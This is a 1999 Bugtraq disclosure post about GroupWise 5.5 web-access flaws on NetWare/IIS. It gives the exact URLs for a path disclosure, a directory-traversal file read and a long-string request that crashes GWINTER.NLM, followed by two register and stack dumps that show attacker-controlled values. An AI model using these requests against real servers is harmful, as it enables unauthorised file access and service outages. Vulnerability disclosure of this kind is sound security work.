[13087] in bugtraq
Re: Groupwise Web Interface
daemon@ATHENA.MIT.EDU (Andrew Frith)
Thu Dec 23 16:48:27 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <003e01bf4cec$ac3301c0$02c8010a@muffhead.bm>
Date: Wed, 22 Dec 1999 22:23:16 -0400
Reply-To: Andrew Frith <afrith@IBL.BM>
From: Andrew Frith <afrith@IBL.BM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Setup:
NT 4, SP4, IIS 4
Netware 4.11, SP7a, GW 5.5 SP2 - Internet Agent & Web access NLM
1. Web server path
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
returns:
Could not find file C:\<web server
root>\cgi-bin\GW5\US\HTML3\HELP\BAD-REQUEST.HTM
2. Read files
Using the format
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index I can read any
files that the web service account has read access to & that end in .htm or
.html on the drive, not just in the web areas.
3. DOS?
Sending http://server/cgi-bin/GW5/GWWEB.EXE?<tested with minimum of 512
characters> will cause an abend in GWINTER.NLM (See Break 1 below). The
server appears to function normally. Trying to shut things down
however...... Upon shutting down the Internet agent we then get another
abend, again in GWINTER.NLM (See Break 2 below). The Internet agent will
shut down. The web access will hang, until the server is downed. The NT
box is unaffected by this.
In the first abend GWINTER blows up. Also on the stack is GWENN2.NLM. Not
much there.
In the second abend GWINTER goes boom again. Also on the stack is
GWCMC.NLM. What is a bit more interesting is that EBX = 61616161, or aaaa,
what I was using on the command line. This string is also in the stack
several times.
I have been able to reproduce the above consistently.
***********
Break 1: Server-4.11a: Page Fault Processor Exception (Error code 00000000)
Registers:
CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
EAX = 72006165 EBX = E022BDA8 ECX = 00000004 EDX = 00000001
ESI = E022BDA4 EDI = E022A01C EBP = 00000002 ESP = 0A082F70
EIP = F1B6DD5D FLAGS = 00017297
F1B6DD5D 8A00 MOV AL,[EAX]= ?
EIP in GWINTER.NLM at code start +00000D5Dh
Running process: gwinter 5 Process
Created by: GWINTER.NLM
Stack pointer: A082D60
Stack limit: A063010
Scheduling priority: 0
Wait state: 00
Stack: --0000000A ?
--E022C0D3 ?
--E022BED2 ?
--00000004 ?
--0000024C ?
--E022BECA ?
--E022BD78 ?
--E022BD84 ?
--0A120131 ?
--000001F4 ?
--0A082FE8 ?
--00000000 ?
--E022A02C ?
--E022A01C ?
F1B6D53F (GWINTER.NLM|(Code Start)+53F)
--E022A01C ?
--E022A01C ?
--E0228540 ?
F1B81EF9 ?
--E022A01C ?
F148F0AD (GWENN2.NLM|GW2_NgwThrdCreate+1EE)
--E0228540 ?
--00000000 ?
--E022A01C ?
--00000000 ?
--FB0513E0 ?
--E020E7B0 ?
--0A0F6A60 ?
--FB0513E0 ?
--0A125010 ?
--0A083008 ?
F10BC181 (THREADS.NLM|ScheduleWorkToDo+180)
Additional Information:
The CPU encountered a problem executing code in GWINTER.NLM. The
problem may be in that module or in data passed to that module
by another NLM.
**********
Break 2: Server-4.11a: Page Fault Processor Exception (Error code 00000000)
Registers:
CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
EAX = 00000000 EBX = 61616161 ECX = 00000000 EDX = E0B9B4E0
ESI = 00000001 EDI = 00000096 EBP = 0A123C6C ESP = 0A123C68
EIP = F80BC070 FLAGS = 00017202
F80BC070 8B73FC MOV ESI,[EBX-04]= ?
EIP in SERVER.NLM at code start +000BC070h
Running process: gwinter 0 Process
Created by: GWINTER.NLM
Stack pointer: A123C60
Stack limit: A104010
Scheduling priority: 0
Wait state: 00
Stack: --00000000 ?
--0A123C84 ?
--00000096 ?
--00000001 ?
--61616161 ?
F10B45ED (THREADS.NLM|free+63)
--61616161 ?
--0A123C94 ?
--E022A01C ?
F1B38537 (GWCMC.NLM|cmc_free+11)
--61616161 ?
--0A123FD8 ?
F1B82341 ?
--61616161 ?
--00000008 ?
--00000000 ?
--0A125350 ?
--0000890B (DS.NLM|DSF9085F20+55D8)
F1B83C52 ?
--0BB01F80 (FPSM.NLM|_fltused_+B01A)
--00007286 (DS.NLM|DSF9085F20+3F53)
--F915D970 ?
--F915DAA0 ?
--00000000 ?
--0A123CF8 ?
--0A123CF0 ?
--0A0F6460 ?
--00000001 ?
--00000004 ?
F80BC193 ?
--00000004 ?
--002E12E0 ?
Additional Information:
The CPU encountered a problem executing code in SERVER.NLM. The
problem may be in that module or in data passed to that module
by a process owned by GWINTER.NLM.
